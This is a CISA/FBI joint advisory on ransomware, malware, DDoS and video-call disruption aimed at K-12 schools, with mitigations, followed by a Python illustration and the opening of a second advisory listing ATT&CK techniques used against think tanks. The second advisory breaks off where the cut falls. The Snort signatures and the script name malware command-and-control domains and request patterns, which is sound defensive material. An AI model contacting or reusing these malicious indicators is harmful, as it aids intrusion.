Original release date: December 10, 2020<br/><h3>Summary</h3><p>This Joint Cybersecurity Advisory was coauthored by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC).</p> <p>The FBI, CISA, and MS-ISAC assess malicious cyber actors are targeting kindergarten through twelfth grade (K-12) educational institutions, leading to ransomware attacks, the theft of data, and the disruption of distance learning services. Cyber actors likely view schools as targets of opportunity, and these types of attacks are expected to continue through the 2020/2021 academic year. These issues will be particularly challenging for K-12 schools that face resource limitations; therefore, educational leadership, information technology personnel, and security personnel will need to balance this risk when determining their cybersecurity investments.</p> <p><a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-345A_Joint_Cybersecurity_Advisory_Distance_Learning_S508C.pdf">Click here</a> for a PDF version of this report.</p> <h3>Technical Details</h3><p>As of December 2020, the FBI, CISA, and MS-ISAC continue to receive reports from K-12 educational institutions about the disruption of distance learning efforts by cyber actors.</p> <h4>Ransomware</h4> <p>The FBI, CISA, and MS-ISAC have received numerous reports of ransomware attacks against K-12 educational institutions. In these attacks, malicious cyber actors target school computer systems, slowing access, and—in some instances—rendering the systems inaccessible for basic functions, including distance learning. 
Adopting tactics previously leveraged against business and industry, ransomware actors have also stolen—and threatened to leak—confidential student data to the public unless institutions pay a ransom.</p> <p>According to MS-ISAC data, the percentage of reported ransomware incidents against K-12 schools increased at the beginning of the 2020 school year. In August and September, 57% of ransomware incidents reported to the MS-ISAC involved K-12 schools, compared to 28% of all reported ransomware incidents from January through July.</p> <p>The five most common ransomware variants identified in incidents targeting K-12 schools between January and September 2020—based on open source information as well as victim and third-party incident reports made to MS-ISAC—are Ryuk, Maze, Nefilim, AKO, and Sodinokibi/REvil.</p> <h4>Malware</h4> <p>Figure 1 identifies the top 10 malware strains that have affected state, local, tribal, and territorial (SLTT) educational institutions over the past year (up to and including September 2020). Note: These malware variants are purely opportunistic as they not only affect educational institutions but other organizations as well.</p> <p>ZeuS and Shlayer are among the most prevalent malware affecting K-12 schools.</p> <ul> <li>ZeuS is a Trojan with several variants that targets Microsoft Windows operating systems. Cyber actors use ZeuS to infect target machines and send stolen information to command-and-control servers.</li> <li>Shlayer is a Trojan downloader and dropper for MacOS malware. It is primarily distributed through malicious websites, hijacked domains, and malicious advertising posing as a fake Adobe Flash updater. 
<strong>Note: </strong>Shlayer is the only malware of the top 10 that targets MacOS; the other 9 affect Microsoft Windows operating systems.</li> </ul> <p class="text-align-center"><img alt="Figure 1: Top 10 malware affecting SLTT educational institutions" data-entity-type="file" data-entity-uuid="ee5aa08d-fe73-44e6-8f7d-4b5e6ac08320" height="275" src="https://us-cert.cisa.gov/sites/default/files/publications/Top%2010%20Malware%20-%20K-12.png" width="614" /></p> <p class="text-align-center"><cite>Figure 1: Top 10 malware affecting SLTT educational institutions</cite></p> <h4>Distributed Denial-of-Service Attacks</h4> <p>Cyber actors are causing disruptions to K-12 educational institutions—including third-party services supporting distance learning—with distributed denial-of-service (DDoS) attacks, which temporarily limit or prevent users from conducting daily operations. The availability of DDoS-for-hire services provides opportunities for any motivated malicious cyber actor to conduct disruptive attacks regardless of experience level. <strong>Note:</strong> DDoS attacks overwhelm servers with a high volume of internet traffic originating from many different sources, so they cannot be mitigated by blocking a single source.</p> <h4>Video Conference Disruptions</h4> <p>Numerous reports received by the FBI, CISA, and MS-ISAC since March 2020 indicate uninvited users have disrupted live video-conferenced classroom sessions. These disruptions have included verbally harassing students and teachers, displaying pornography and/or violent images, and doxing meeting attendees (<strong>Note: </strong>doxing is the act of compiling or publishing personal information about an individual on the internet, typically with malicious intent). 
To enter classroom sessions, uninvited users have been observed:</p> <ul> <li>Using student names to trick hosts into accepting them into class sessions, and</li> <li>Accessing meetings from either publicly available links or links shared with outside users (e.g., students sharing links and/or passwords with friends).</li> </ul> <p>Video conference sessions without proper control measures risk disruption or compromise of classroom conversations and exposure of sensitive information.</p> <h3>Additional Risks and Vulnerabilities</h3> <p>In addition to the recent reporting of distance learning disruptions received by the FBI, CISA, and MS-ISAC, malicious cyber actors are expected to continue seeking opportunities to exploit the evolving remote learning environment.</p> <h4>Social Engineering</h4> <p>Cyber actors could apply social engineering methods against students, parents, faculty, IT personnel, or other individuals involved in distance learning. Tactics, such as phishing, trick victims into revealing personal information (e.g., password or bank account information) or performing a task (e.g., clicking on a link). In such scenarios, a victim could receive what appears to be legitimate email that:</p> <ul> <li>Requests personally identifiable information (PII) (e.g., full name, birthdate, student ID),</li> <li>Directs the user to confirm a password or personal identification number (PIN),</li> <li>Instructs the recipient to visit a website that is compromised by the cyber actor, or</li> <li>Contains an attachment with malware.</li> </ul> <p>Cyber actors also register web domains that are similar to legitimate websites in an attempt to capture individuals who mistype URLs or click on similar looking URLs. These types of attacks are referred to as domain spoofing or homograph attacks. 
For example, a user wanting to access <code>www.cottoncandyschool.edu</code> could mistakenly click on <code>www.cottencandyschool.edu</code> (changed “<code>o</code>” to an “<code>e</code>”) or <code>www.cottoncandyschoo1.edu</code> (changed letter “<code>l</code>” to a number “1”) (<strong>Note:</strong> this is a fictitious example to demonstrate how a user can mistakenly click and access a website without noticing subtle changes in website URLs). Victims believe they are on a legitimate website when, in reality, they are visiting a site controlled by a cyber actor.</p> <h4>Technology Vulnerabilities and Student Data</h4> <p>Whether as collateral for ransomware attacks or to sell on the dark web, cyber actors may seek to exploit the data-rich environment of student information in schools and education technology (edtech) services. The need for schools to rapidly transition to distance learning likely contributed to cybersecurity gaps, leaving schools vulnerable to attack. In addition, educational institutions that have outsourced their distance learning tools may have lost visibility into data security measures. Cyber actors could view the increased reliance on—and sharp usership growth in—these distance learning services and student data as lucrative targets.</p> <h4>Open/Exposed Ports</h4> <p>The FBI, CISA, and MS-ISAC frequently see malicious cyber actors exploiting exposed Remote Desktop Protocol (RDP) services to gain initial access to a network and, often, to manually deploy ransomware. For example, cyber actors will attack ports 445 (Server Message Block [SMB]) and 3389 (RDP) to gain network access. They are then positioned to move laterally throughout a network (often using SMB), escalate privileges, access and exfiltrate sensitive information, harvest credentials, or deploy a wide variety of malware. 
This popular attack vector allows cyber actors to maintain a low profile, as they are using a legitimate network service that provides them with the same functionality as any other remote user.</p> <h4>End-of-Life Software</h4> <p>End-of-Life (EOL) software is regularly exploited by cyber actors—often to gain initial access, deface websites, or further their reach in a network. Once a product reaches EOL, customers no longer receive security updates, technical support, or bug fixes. Unpatched and vulnerable servers are likely to be exploited by cyber actors, hindering an organization’s operational capacity.</p> <h3>Mitigations</h3><h4>Plans and Policies</h4> <p>The FBI and CISA encourage educational providers to maintain business continuity plans—the practice of executing essential functions through emergencies (e.g., cyberattacks)—to minimize service interruptions. Without planning, provision, and implementation of continuity principles, institutions may be unable to continue teaching and administrative operations. Evaluating continuity and capability will help identify potential operational gaps. Through identifying and addressing these gaps, institutions can establish a viable continuity program that will help keep them functioning during cyberattacks or other emergencies. 
The FBI and CISA suggest K-12 educational institutions review or establish patching plans, security policies, user agreements, and business continuity plans to ensure they address current threats posed by cyber actors.</p> <h4>Network Best Practices</h4> <ul> <li>Patch operating systems, software, and firmware as soon as manufacturers release updates.</li> <li>Check configurations for every operating system version on institution-owned assets, so that problems do not arise that local users cannot fix themselves because local administration is disabled.</li> <li>Regularly change passwords to network systems and accounts and avoid reusing passwords for different accounts.</li> <li>Use multi-factor authentication where possible.</li> <li>Disable unused remote access/RDP ports and monitor remote access/RDP logs.</li> <li>Implement application and remote access allow listing so that systems execute only programs known and permitted by the established security policy.</li> <li>Audit user accounts with administrative privileges and configure access controls with least privilege in mind.</li> <li>Audit logs to ensure new accounts are legitimate.</li> <li>Scan for open or listening ports and remediate (close or firewall) those that are not needed.</li> <li>Identify critical assets such as student database servers and distance learning infrastructure; create backups of these systems and house the backups offline from the network.</li> <li>Implement network segmentation. Sensitive data should not reside on the same server and network segment as the email environment.</li> <li>Set antivirus and anti-malware solutions to automatically update; conduct regular scans.</li> </ul> <h4>User Awareness Best Practices</h4> <ul> <li>Focus on awareness and training. Because end users are targeted, make employees and students aware of the threats—such as ransomware and phishing scams—and how they are delivered. 
Additionally, provide users training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.</li> <li>Ensure employees know who to contact when they see suspicious activity or when they believe they have been a victim of a cyberattack. This will ensure that the proper established mitigation strategy can be employed quickly and efficiently.</li> <li>Monitor privacy settings and information available on social networking sites.</li> </ul> <h4>Ransomware Best Practices</h4> <p>The FBI and CISA do not recommend paying ransoms. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. However, regardless of whether your organization decided to pay the ransom, the FBI urges you to report ransomware incidents to your local FBI field office. Doing so provides the FBI with the critical information they need to prevent future attacks by identifying and tracking ransomware attackers and holding them accountable under U.S. 
law.</p> <p>In addition to implementing the above network best practices, the FBI and CISA also recommend the following:</p> <ul> <li>Regularly back up data, air gap, and password protect backup copies offline.</li> <li>Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location.</li> </ul> <h4>Denial-of-Service Best Practices</h4> <ul> <li>Consider enrolling in a denial-of-service mitigation service that detects abnormal traffic flows and redirects traffic away from your network.</li> <li>Create a partnership with your local internet service provider (ISP) prior to an event and work with your ISP to control network traffic attacking your network during an event.</li> <li>Configure network firewalls to block unauthorized IP addresses and disable port forwarding.</li> </ul> <h4>Video-Conferencing Best Practices</h4> <ul> <li>Ensure participants use the most updated version of remote access/meeting applications.</li> <li>Require passwords for session access.</li> <li>Encourage students to avoid sharing passwords or meeting codes.</li> <li>Establish a vetting process to identify participants as they arrive, such as a waiting room.</li> <li>Establish policies to require participants to sign in using true names rather than aliases.</li> <li>Ensure only the host controls screensharing privileges.</li> <li>Implement a policy to prevent participants from entering rooms prior to host arrival and to prevent the host from exiting prior to the departure of all participants.</li> </ul> <h4>Edtech Implementation Considerations</h4> <p>When partnering with third-party and edtech services to support distance learning, educational institutions should consider the following:</p> <ul> <li>The service provider’s cybersecurity policies and response plan in the event of a breach and their remediation practices: <ul> <li>How did the service provider resolve past cyber incidents? 
How did their cybersecurity practices change after these incidents?</li> </ul> </li> <li>The provider’s data security practices for their products and services (e.g., data encryption in transit and at rest, security audits, security training of staff, audit logs);</li> <li>The provider’s data maintenance and storage practices (e.g., use of company servers, cloud storage, or third-party services);</li> <li>Types of student data the provider collects and tracks (e.g., PII, academic, disciplinary, medical, biometric, IP addresses);</li> <li>Entities to whom the provider will grant access to the student data (e.g., vendors);</li> <li>How the provider will use student data (e.g., will they sell it to—or share it with—third parties for service enhancement, new product development, studies, marketing/advertising?);</li> <li>The provider’s de-identification practices for student data; and</li> <li>The provider’s policies on data retention and deletion.</li> </ul> <h4>Malware Defense</h4> <p>Table 1 identifies CISA-created Snort signatures, which have been successfully used to detect and defend against related attacks, for the malware variants listed below. 
<strong>Note:</strong> the listing is not fully comprehensive and should not be used to the exclusion of other detection methods. The <code>sid:00000000</code> and <code>&lt;unique_ID&gt;</code> values in the rules are placeholders; assign a SID from your local range and a flowbit name before loading them.</p> <p class="text-align-center"><em>Table 1: Malware signatures</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 881.46px; height: 312px; margin-right: auto; margin-left: auto;"> <thead> <tr> <th scope="col" style="width: 198px;"><strong>Malware</strong></th> <th scope="col" style="width: 356px;"><strong>Signature</strong></th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 198px; text-align: left;"><strong>NanoCore</strong></td> <td scope="col" style="width: 356px; text-align: left;"><code>alert tcp any any -&gt; any $HTTP_PORTS (msg:"NANOCORE:HTTP GET URI contains 'FAD00979338'"; sid:00000000; rev:1; flow:established,to_server; content:"GET"; http_method; content:"getPluginName.php?PluginID=FAD00979338"; fast_pattern; http_uri; classtype:http-uri; metadata:service http;)</code></td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;"><strong>Cerber</strong></td> <td scope="col" style="width: 356px; text-align: left;"><code>alert tcp any any -&gt; any $HTTP_PORTS (msg:"HTTP Client Header contains 'host|3a 20|polkiuj.top'"; sid:00000000; rev:1; flow:established,to_server; flowbits:isnotset,&lt;unique_ID&gt;.tagged; content:"host|3a 20|polkiuj.top|0d 0a|"; http_header; fast_pattern:only; flowbits:set,&lt;unique_ID&gt;.tagged; tag:session,10,packets; classtype:http-header; metadata:service http;)</code></td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;"><strong>Kovter</strong></td> <td scope="col" style="width: 356px; text-align: left;"><code>alert tcp any any -&gt; any $HTTP_PORTS (msg:"Kovter:HTTP URI POST to CnC Server"; sid:00000000; rev:1; flow:established,to_server; flowbits:isnotset,&lt;unique_ID&gt;.tagged; content:"POST / HTTP/1.1"; depth:15; content:"Content-Type|3a 20|application/x-www-form-urlencoded"; http_header; depth:47; 
fast_pattern; content:"User-Agent|3a 20|Mozilla/"; http_header; content:!"LOADCURRENCY"; nocase; content:!"Accept"; http_header; content:!"Referer|3a|"; http_header; content:!"Cookie|3a|"; nocase; http_header; pcre:"/^(?:[A-Za-z0-9+\/]{4})*(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{4})$/P"; pcre:"/User-Agent\x3a[^\r\n]+\r\nHost\x3a\x20(?:\d{1,3}\.){3}\d{1,3}\r\nContent-Length\x3a\x20[1-5][0-9]{2,3}\r\n(?:Cache-Control|Pragma)\x3a[^\r\n]+\r\n(?:\r\n)?$/H"; flowbits:set,&lt;unique_ID&gt;.tagged; tag:session,10,packets; classtype:nonstd-tcp; metadata:service http;)</code></td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;"><strong>Dridex</strong></td> <td scope="col" style="width: 356px; text-align: left;"> <p><code>alert tcp any any -&gt; any $HTTP_PORTS (msg:"HTTP URI GET contains 'invoice_########.doc' (DRIDEX)"; sid:00000000; rev:1; flow:established,to_server; content:"invoice_"; http_uri; fast_pattern:only; content:".doc"; nocase; distance:8; within:4; content:"GET"; nocase; http_method; classtype:http-uri; metadata:service http;)<br /> alert tcp any any -&gt; any $HTTP_PORTS (msg:"HTTP Client Header contains 'Host|3a 20|tanevengledrep ru' (DRIDEX)"; sid:00000000; rev:1; flow:established,to_server; flowbits:isnotset,&lt;unique_ID&gt;.tagged; content:"Host|3a 20|tanevengledrep|2e|ru|0d 0a|"; http_header; fast_pattern:only; flowbits:set,&lt;unique_ID&gt;.tagged; tag:session,10,packets; classtype:http-header; metadata:service http;)</code></p> </td> </tr> </tbody> </table> <h3>Contact Information</h3><p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href="https://www.fbi.gov/contact-us/field-offices">www.fbi.gov/contact-us/field</a>. 
When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting organization; and a designated point of contact.</p> <p>To request incident response resources or technical assistance related to these threats, contact CISA at <a href="mailto:Central@cisa.gov">Central@cisa.gov</a>.</p> <h3>Resources</h3> <p>MS-ISAC membership is open to employees or representatives from all public K-12 education entities in the United States. The MS-ISAC provides multiple cybersecurity services and benefits to help K-12 education entities increase their cybersecurity posture. To join, visit <a href="https://learn.cisecurity.org/ms-isac-registration">https://learn.cisecurity.org/ms-isac-registration</a>.</p> <ul> <li><a href="https://www.cisa.gov/telework">CISA Telework Guidance and Resources</a></li> <li><a href="https://www.cisa.gov/publication/secure-video-conferencing-schools">CISA Cybersecurity Recommendations and Tips for Schools Using Video Conferencing</a></li> <li><a href="https://us-cert.cisa.gov/Ransomware">CISA Ransomware Publications</a></li> <li><a href="https://www.cisa.gov/emergency-services-sector-continuity-planning-suite">CISA Emergency Services Sector Continuity Planning Suite</a></li> <li><a href="https://www.cisa.gov/publication/ransomware-guide">CISA-MS-ISAC Joint Ransomware Guide</a></li> <li><a href="https://us-cert.cisa.gov/ncas/tips/ST04-014">CISA Tip: Avoiding Social Engineering and Phishing Attacks</a></li> <li><a href="https://www.us-cert.gov/ncas/tips/ST04-006">CISA Tip: Understanding Patches</a></li> <li><a href="https://cyber.org/cybersafety">CISA and CYBER.ORG “Cyber Safety Video Series” for K-12 students and educators</a></li> <li><a href="https://www.ic3.gov/media/2019/191002.aspx">FBI PSA: “High-Impact Ransomware Attacks Threaten U.S. Businesses and Organizations”</a></li> </ul> <p><strong>Note: </strong>contact your local FBI field office (<a href="http://www.fbi.gov/contact-us/field">www.fbi.gov/contact-us/field</a>) for additional FBI products on ransomware, edtech, and cybersecurity for educational institutions.</p> <h3>Revisions</h3> <ul> <li>Initial Version: December 10, 2020</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>
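<p>As an added illustration that is not part of the advisory and not Snort itself, the following Python evaluates the HTTP-layer conditions of the Table 1 signatures (NanoCore, Cerber, Kovter and Dridex) over constructed sample requests. It ignores the flow, flowbits, tag and fast_pattern options and Snort's buffer normalization, so it shows what each rule keys on rather than replacing a run of the rules in Snort; the sample requests and RFC 5737 addresses are constructed, not captured traffic.</p>

```python
"""Simplified evaluator for the HTTP conditions of the Table 1 Snort rules.
Added illustration only (not Snort, not CISA/MS-ISAC tooling): it checks the
content/pcre conditions on method, URI, header block and body, and ignores the
flow, flowbits, tag and fast_pattern options and Snort's buffer normalization.
"""
import base64
import re
from dataclasses import dataclass

# pcre options of the Kovter rule: /P binds to the client body, /H to headers.
KOVTER_BODY_RE = re.compile(
    rb"^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{4})$"
)
KOVTER_HEADER_RE = re.compile(
    rb"User-Agent\x3a[^\r\n]+\r\nHost\x3a\x20(?:\d{1,3}\.){3}\d{1,3}\r\n"
    rb"Content-Length\x3a\x20[1-5][0-9]{2,3}\r\n"
    rb"(?:Cache-Control|Pragma)\x3a[^\r\n]+\r\n(?:\r\n)?$"
)
# Dridex: ".doc" (nocase) must begin exactly 8 bytes after "invoice_"
# (distance:8; within:4), i.e. the invoice_########.doc shape named in the msg.
DRIDEX_URI_RE = re.compile(rb"invoice_.{8}\.[Dd][Oo][Cc]")

@dataclass
class HttpRequest:
    raw: bytes      # whole request; content options without a buffer modifier search this
    method: bytes   # http_method buffer
    uri: bytes      # http_uri buffer
    headers: bytes  # http_header buffer: header lines after the request line
    body: bytes     # http_client_body buffer

def parse_request(raw: bytes) -> HttpRequest:
    """Split a client request into the buffers the rule options refer to."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    request_line, _, header_lines = head.partition(b"\r\n")
    parts = request_line.split(b" ", 2)
    if len(parts) != 3:
        raise ValueError("malformed request line")
    return HttpRequest(raw, parts[0], parts[1], header_lines + sep, body)

def nanocore(req: HttpRequest) -> bool:
    return req.method == b"GET" and b"getPluginName.php?PluginID=FAD00979338" in req.uri

def cerber(req: HttpRequest) -> bool:
    # content without nocase is case-sensitive: the rule keys on a lowercase "host"
    return b"host: polkiuj.top\r\n" in req.headers

def kovter(req: HttpRequest) -> bool:
    content_type = b"Content-Type: application/x-www-form-urlencoded"  # 47 bytes
    return (
        req.raw.startswith(b"POST / HTTP/1.1")        # depth:15 on the raw payload
        and content_type in req.headers[:47]          # depth:47: must be the first header
        and b"User-Agent: Mozilla/" in req.headers
        and b"loadcurrency" not in req.raw.lower()    # negated content, nocase
        and b"Accept" not in req.headers
        and b"Referer:" not in req.headers
        and b"cookie:" not in req.headers.lower()
        and KOVTER_BODY_RE.search(req.body) is not None
        and KOVTER_HEADER_RE.search(req.headers) is not None
    )

def dridex_uri(req: HttpRequest) -> bool:
    return req.method.upper() == b"GET" and DRIDEX_URI_RE.search(req.uri) is not None

def dridex_host(req: HttpRequest) -> bool:
    return b"Host: tanevengledrep.ru\r\n" in req.headers

SIGNATURES = {
    "NanoCore": nanocore,
    "Cerber": cerber,
    "Kovter": kovter,
    "Dridex (URI)": dridex_uri,
    "Dridex (Host header)": dridex_host,
}

def match_signatures(raw: bytes) -> list:
    """Return the names of every rule whose conditions the request satisfies."""
    req = parse_request(raw)
    return [name for name, check in SIGNATURES.items() if check(req)]

# Constructed sample requests (not captured traffic), RFC 5737 addresses.
SAMPLE_NANOCORE = b"GET /getPluginName.php?PluginID=FAD00979338 HTTP/1.1\r\nHost: 203.0.113.5\r\n\r\n"
SAMPLE_DRIDEX = b"GET /docs/invoice_20201210.doc HTTP/1.1\r\nHost: tanevengledrep.ru\r\n\r\n"
KOVTER_BODY = base64.b64encode(b"A" * 93)  # 124 base64 chars, no padding
SAMPLE_KOVTER = (
    b"POST / HTTP/1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Host: 198.51.100.7\r\n"
    b"Content-Length: %d\r\n"
    b"Cache-Control: no-cache\r\n\r\n" % len(KOVTER_BODY)
) + KOVTER_BODY
SAMPLE_BENIGN = (
    b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\nAccept: text/html\r\n\r\n"
)
if __name__ == "__main__":
    for sample in (SAMPLE_NANOCORE, SAMPLE_DRIDEX, SAMPLE_KOVTER, SAMPLE_BENIGN):
        print(match_signatures(sample) or "no match")
```

The Kovter check is the one worth studying: the negated headers and the `depth:47` on the first header line mean a request with an `Accept` header or with `Content-Type` anywhere but first does not fire, which is why a single added header in a sample is enough to turn the match off.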
December 1, 2020

AA20-336A: Advanced Persistent Threat Actors Targeting U.S. Think Tanks

Original release date: December 1, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) framework. See the <a href="https://attack.mitre.org/versions/v7/techniques/enterprise/">ATT&amp;CK for Enterprise</a> for all referenced threat actor tactics and techniques.</em></p> <p>The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have observed persistent continued cyber intrusions by advanced persistent threat (APT) actors targeting U.S. think tanks. This malicious activity is often, but not exclusively, directed at individuals and organizations that focus on international affairs or national security policy.[<a href="https://www.cyberscoop.com/european-think-tanks-hack-microsoft-fancy-bear-russia/">1</a>] The following guidance may assist U.S. think tanks in developing network defense procedures to prevent or rapidly detect these attacks.</p> <p>APT actors have relied on multiple avenues for initial access. These have included low-effort capabilities such as spearphishing emails and third-party message services directed at both corporate and personal accounts, as well as exploiting vulnerable web-facing devices and remote connection capabilities. Increased telework during the COVID-19 pandemic has expanded workforce reliance on remote connectivity, affording malicious actors more opportunities to exploit those connections and to blend in with increased traffic. Attackers may leverage virtual private networks (VPNs) and other remote work tools to gain initial access or persistence on a victim’s network. When successful, these low-effort, high-reward approaches allow threat actors to steal sensitive information, acquire user credentials, and gain persistent access to victim networks.</p> <p>Given the importance that think tanks can have in shaping U.S. 
policy, CISA and FBI urge individuals and organizations in the international affairs and national security sectors to immediately adopt a heightened state of awareness and implement the critical steps listed in the Mitigations section of this Advisory.</p> <p><a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-336A-APT_Actors_Targeting_US_ThinkTanks.pdf">Click here</a> for a PDF version of this report.</p> <h3>Technical Details</h3><h4>ATT&amp;CK Profile</h4> <p>CISA created the following MITRE ATT&amp;CK profile to provide a non-exhaustive list of tactics, techniques, and procedures (TTPs) employed by APT actors to break through think tanks’ defenses, conduct reconnaissance in their environments, exfiltrate proprietary or confidential information, and execute effects on targets. These TTPs were included based upon closed reporting on APT actors that are known to target think tanks or based upon CISA incident response data.</p> <ul> <li><em><strong>Initial Access</strong></em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0001">TA0001</a>] <ul> <li><i>Valid Accounts </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1078/">T1078</a>]</li> <li><i>Valid Accounts: Cloud Accounts </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1078/004/">T1078.004</a>]</li> <li><i>External Remote Services </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1133/">T1133</a>]</li> <li><i>Drive-by Compromise</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1189">T1189</a>]</li> <li><i>Exploit Public-Facing Application</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1190">T1190</a>] <ul> <li><i>Supply Chain Compromise: Compromise Software Supply Chain</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1195/002">T1195.002</a>]</li> <li><i>Trusted Relationship</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1199">T1199</a>]</li> <li><i>Phishing: Spearphishing 
Attachment</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/001">T1566.001</a>]</li> <li><i>Phishing: Spearphishing Link</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/002">T1566.002</a>]</li> <li><i>Phishing: Spearphishing via Service</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/003">T1566.003</a>]</li> </ul> </li> </ul> </li> <li><i><em><strong>Execution</strong></em></i> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0002">TA0002</a>] <ul> <li><i>Windows Management Instrumentation </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1047">T1047</a>]</li> <li><i>Scheduled Task/Job: Scheduled Task </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1053/005">T1053.005</a>]</li> <li><i>Command and Scripting Interpreter: PowerShell </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1059/001">T1059.001</a>]</li> <li><i>Command and Scripting Interpreter: Windows Command Shell</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1059/003">T1059.003</a>]</li> <li><i>Command and Scripting Interpreter: Unix Shell</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1059/004">T1059.004</a>]</li> <li><i>Command and Scripting Interpreter: Visual Basic </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1059/005">T1059.005</a>]</li> <li><i>Command and Scripting Interpreter: Python </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1059/006">T1059.006</a>]</li> <li><i>Native API </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1106">T1106</a>]</li> <li><i>Exploitation for Client Execution</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1203">T1203</a>]</li> <li><i>User Execution: Malicious Link </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1204/001">T1204.001</a>]</li> <li><i>User Execution: Malicious File</i> [<a 
href="https://attack.mitre.org/versions/v7/techniques/T1204/002">T1204.002</a>]</li> <li><i>Inter-Process Communication: Dynamic Data Exchange </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1559/002/">T1559.002</a>]</li> <li><i>System Services: Service Execution </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1569/002">T1569.002</a>]</li> </ul> </li> <li><i><em><strong>Persistence</strong></em></i> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0003">TA0003</a>] <ul> <li><i>Boot or Logon Initialization Scripts: Logon Script (Windows)</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1037/001">T1037.001</a>]</li> <li><i>Scheduled Task/Job: Scheduled Task</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1053/005">T1053.005</a>]</li> <li><i>Account Manipulation: Exchange Email Delegate Permissions </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1098/002">T1098.002</a>]</li> <li><i>Create Account: Local Account</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1136/001">T1136.001</a>]</li> <li><i>Office Application Startup: Office Test </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1137/002">T1137.002</a>]</li> <li><i>Office Application Startup: Outlook Home Page</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1137/004">T1137.004</a>]</li> <li><i>Browser Extensions</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1176">T1176</a>]</li> <li><i>BITS Jobs</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1197/">T1197</a>]</li> <li><i>Server Software Component: Web Shell</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1505/003">T1505.003</a>]</li> <li><i>Pre-OS Boot: Bootkit</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1542/003/">T1542.003</a>]</li> <li><i>Create or Modify System Process: Windows Service</i> [<a 
href="https://attack.mitre.org/versions/v7/techniques/T1543/003">T1543.003</a>]</li> <li><i>Event Triggered Execution: Change Default File Association</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1546/001">T1546.001</a>]</li> <li><i>Event Triggered Execution: Windows Management Instrumentation Event Subscription </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1546/003">T1546.003</a>]</li> <li><i>Event Triggered Execution: Accessibility Features</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1546/008">T1546.008</a>]</li> <li><i>Event Triggered Execution: Component Object Model Hijacking</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1546/015">T1546.015</a>]</li> <li><i>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1547/001">T1547.001</a>]</li> <li><i>Boot or Logon Autostart Execution: Shortcut Modification</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1547/009">T1547.009</a>]</li> </ul> </li> <li><i><em><strong>Privilege Escalation</strong></em></i> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0004">TA0004</a>] <ul> <li><i>Process Injection</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1055">T1055</a>]</li> <li><i>Process Injection: Process Hollowing</i> [<a 